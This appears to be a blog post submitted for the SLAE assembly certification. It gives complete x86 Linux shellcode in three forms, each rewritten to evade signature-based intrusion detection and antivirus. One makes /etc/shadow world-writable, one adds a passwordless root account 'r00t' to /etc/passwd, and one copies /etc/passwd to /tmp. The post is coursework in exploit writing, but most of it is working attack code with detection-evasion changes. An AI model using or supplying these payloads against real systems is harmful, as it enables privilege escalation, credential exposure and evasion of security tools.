SLAE: Polymorphic Shellcodes

Intro

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE-924

The task is to:

  • Take up 3 shellcodes from Shell-Storm and create polymorphic versions of them to beat pattern matching
  • The polymorphic versions cannot be larger 150% of the existing shellcode
  • Bonus points for making it shorter in length than original

chmod(“/etc/shadow”, 0666) and exit

This shellcode can be found here. It’s size is 36 bytes. Original shellcode:

section .text
 global _start

_start:
    xor edx, edx
    push byte 15
    pop eax
    push edx
    push byte 0x77
    push word 0x6f64
    push 0x6168732f
    push 0x6374652f
    mov ebx, esp
    push word 0666Q
    pop ecx
    int 0x80

    push byte 1
    pop eax
    int 0x80

Let’s modify it to beat signature-based intrusion detecting systems and AVs.

push byte 0x77
push word 0x6f64
push 0x6168732f
push 0x6374652f

We’ll modify as:

push 0x776f64
push 0x6168732f
push 0x6374652f

And also we will modify exit function. In original shellcode:

push byte 1
pop eax

In our shellcode:

xor eax, eax
inc eax

Result shellcode:

section .text
global _start

_start:
    xor edx, edx
    push byte 15
    pop eax
    push edx
    push 0x776f64
    push 0x6168732f
    push 0x6374652f
    mov ebx, esp
    push word 0666Q
    pop ecx
    int 0x80           ;chmod syscall

    xor eax, eax
    inc eax
    int 0x80           ;exit syscall

Our shellcode even 1 byte smaller than original :)

add root user ‘r00t’ with no password shellcode

Shellcode is available here

Let’s modify it to beat signature-based intrusion detecting systems and AVs.

push byte 5
pop eax

was modified to

push byte 5
pop edi
mov eax, edi

in write function:

push byte 4
pop eax

was modified to:

dec edi
mov eax, edi

in close function:

push byte 6
pop eax

was modified to:

inc edi
inc edi
xchg eax, edi

Full modified shellcode:

section .text
     global _start

_start:

 ; open("/etc//passwd", O_WRONLY | O_APPEND)

       push byte 5
       pop edi
       mov eax, edi
       xor ecx, ecx
       push ecx
       push 0x64777373
       push 0x61702f2f
       push 0x6374652f
       mov ebx, esp
       mov cx, 02001Q
       int 0x80

       mov ebx, eax

  ; write(ebx, "r00t::0:0:::", 12)

       dec edi
       mov eax, edi
       xor edx, edx
       push edx
       push 0x3a3a3a30
       push 0x3a303a3a
       push 0x74303072
       mov ecx, esp
       push byte 12
       pop edx
       int 0x80

  ; close(ebx)

       inc edi
       inc edi
       xchg eax, edi
       int 0x80

  ; exit()

       push byte 1
       pop eax
       int 0x80

Original shellcode length was: 69 bytes. Modified shellcode length is only 2 bytes larger: 71 bytes.

Copy /etc/passwd to /tmp/outfile

Shellcode is available here It’s size is 97 bytes. Let’s modify it to beat signature-based intrusion detecting systems and AVs.

xor eax,eax
mov al,0x5
xor ecx,ecx

was replaced with

xor eax, eax
add al, 0x5
mov ecx, eax

0x2f was moved to get /etc//passwd

push 0x64777373
push 0x61702f2f
push 0x6374652f

In sys_read function:

push WORD 0xffff
pop edx

was replaced with:

xor edx, edx
dec dx

In sys_open function:

push 0x5
pop eax
xor ecx,ecx

was replaced with:

xor eax, eax
mov ecx, eax
add al,0x5

In sys_write function:

push 0x4
pop eax

was replaced with:

xor eax, eax
add al,0x4

And finally in sys_exit function:

xor eax,eax
xor ebx,ebx
mov al,0x1
mov bl,0x5

was replaced with:

xor ebx,ebx
mov eax, ebx
add al, 0x1
add bl, 0x5

Full modified shellcode:

global _start
section .text
_start:
    xor eax, eax
    add al, 0x5
    mov ecx, eax
    push ecx
    push 0x64777373
    push 0x61702f2f
    push 0x6374652f    ;0x2f moved to get /etc//passwd
    mov ebx, esp
    int 0x80

    mov ebx,eax
    mov al,0x3
    mov edi,esp
    mov ecx,edi
    xor edx, edx
    dec dx
    int 0x80

    mov esi, eax

    xor eax, eax
    mov ecx, eax
    add al,0x5
    push ecx
    push 0x656c6966
    push 0x74756f2f
    push 0x706d742f
    mov ebx,esp
    mov cl,0102o
    push WORD 0644o
    pop edx
    int 0x80

    mov ebx,eax
    xor eax, eax
    add al,0x4
    mov ecx,edi
    mov edx,esi
    int 0x80

    xor ebx,ebx
    mov eax, ebx
    add al, 0x1
    add bl, 0x5
    int 0x80

The size of modified shellcode: 98 bytes.